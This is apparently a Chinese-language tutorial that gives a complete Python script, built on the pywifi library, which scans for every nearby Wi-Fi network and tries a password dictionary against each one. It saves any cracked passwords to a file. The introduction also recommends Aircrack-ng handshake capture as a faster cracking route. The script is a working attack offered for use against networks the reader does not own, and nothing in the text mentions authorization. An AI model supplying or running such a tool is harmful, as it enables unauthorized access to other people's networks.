前提建议:
本文提到的爆破方式其实效率很低(因为每次都要重连wifi), 可以拿来做简单破解, 比如自己写个密码字典: 八个6,六个8,1到8...之类的几十个简单密码. 然后跑这个脚本.
如果追求高效爆破. 建议使用Aircrack-ng, 它是通过抓wifi连接数据包, 然后爆破抓到的包数据....抓到连接包之后的工作全部是本地运行, 只要不心疼电脑, 破解速度比这个脚本快了无数倍.
关键点:
1. wifi密码错误后可以无限重试.
2. 我们需要一堆密码去自动尝试, 如果这堆密码试不出来, 那就无法破解
准备材料:
#-*- coding:utf8 -*-
import time
import pywifi
from pywifi import const
#单个密码测试延迟, 超过说明连接太慢,放弃使用
testtimes = 15
#结果文件保存路径
save_files = "avail_nearby_wifis.txt"
passwords = [x.strip("\n") for x in open("weak_passwords.txt","r").readlines()]
already_knows = [x.strip("\n").split("--")[0] for x in open(save_files,"r").readlines()]
already_tried = [x.strip("\n") for x in open("already_tried_passwords.txt","r").readlines()]
def main():
wifi = pywifi.PyWiFi()
#选择定一个网卡并赋值于iface
iface = wifi.interfaces()[0]
#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置
scanres = scans(iface)
nums = len(scanres)
print("附近wifi个数:"+str(nums))
for i,x in enumerate(scanres):
res = test_wifi(nums-i,iface,x,passwords,testtimes)
if res:
print("=====================================================================")
print("找到密码:"+res)
with open(save_files, "a") as f:
f.write(res+"\n")
print("=====================================================================")
def scans(face):
#开始扫描
face.scan()
time.sleep(3)
#在3秒后获取扫描结果
return face.scan_results()
def test_wifi(i,face,x,key,ts):
#显示对应网络名称,考虑到部分中文名啧显示bssid
wifi_name = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid
if wifi_name in already_knows:
print(str(wifi_name)+"--密码已知")
return False
print("尝试连接wifi:"+str(wifi_name))
#迭代字典并进行爆破
total_key = len(key)
for n,password in enumerate(key):
if wifi_name+"--"+password in already_tried:
print("密码试过了...")
continue
with open("already_tried_passwords.txt","a") as f:
f.write(wifi_name+"--"+password+"\n")
already_tried.append(wifi_name+"--"+password)
print("尝试密码:"+str(password)+" -- "+str(n)+"/"+str(total_key))
profile = pywifi.Profile()
profile.ssid = wifi_name
profile.auth = const.AUTH_ALG_OPEN
profile.akm.append(const.AKM_TYPE_WPA2PSK)
profile.cipher = const.CIPHER_TYPE_CCMP
profile.key = password
#移除所有热点配置
face.remove_all_network_profiles()
tmp_profile = face.add_network_profile(profile)
face.connect(tmp_profile)
#初始化状态码,考虑到用0会发生些逻辑错误
code = 10
t1 = time.time()
#循环刷新状态,如果置为0则密码错误,如超时则进行下一个
while code!=0 :
time.sleep(0.1)
code = face.status()
now = time.time()-t1
if now>ts:
break
if code == 4:
face.disconnect()
return str(wifi_name)+"--"+str(password)
return False
if __name__ == '__main__':
main()